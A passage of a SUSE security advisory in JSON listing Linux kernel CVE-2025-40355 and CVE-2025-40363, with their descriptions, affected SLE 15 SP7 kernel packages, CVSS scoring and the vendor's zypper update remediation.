do_sys_openat2+0xa2/0xe0\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? exc_page_fault+0x7e/0x1a0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n [...]\n \u003c/TASK\u003e\n\nFix this by checking is_visible() before trying to touch the attribute.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40355",
"url": "https://www.suse.com/security/cve/CVE-2025-40355"
},
{
"category": "external",
"summary": "SUSE Bug 1255261 for CVE-2025-40355",
"url": "https://bugzilla.suse.com/1255261"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40355"
},
{
"cve": "CVE-2025-40363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv6: fix field-spanning memcpy warning in AH output\n\nFix field-spanning memcpy warnings in ah6_output() and\nah6_output_done() where extension headers are copied to/from IPv6\naddress fields, triggering fortify-string warnings about writes beyond\nthe 16-byte address fields.\n\n memcpy: detected field-spanning write (size 40) of single field \"\u0026top_iph-\u003esaddr\" at net/ipv6/ah6.c:439 (size 16)\n WARNING: CPU: 0 PID: 8838 at net/ipv6/ah6.c:439 ah6_output+0xe7e/0x14e0 net/ipv6/ah6.c:439\n\nThe warnings are false positives as the extension headers are\nintentionally placed after the IPv6 header in memory. Fix by properly\ncopying addresses and extension headers separately, and introduce\nhelper functions to avoid code duplication.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40363",
"url": "https://www.suse.com/security/cve/CVE-2025-40363"
},
{
"category": "external",
"summary": "SUSE Bug 1255102 for CVE-2025-40363",
"url": "https://bugzilla.suse.com/1255102"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
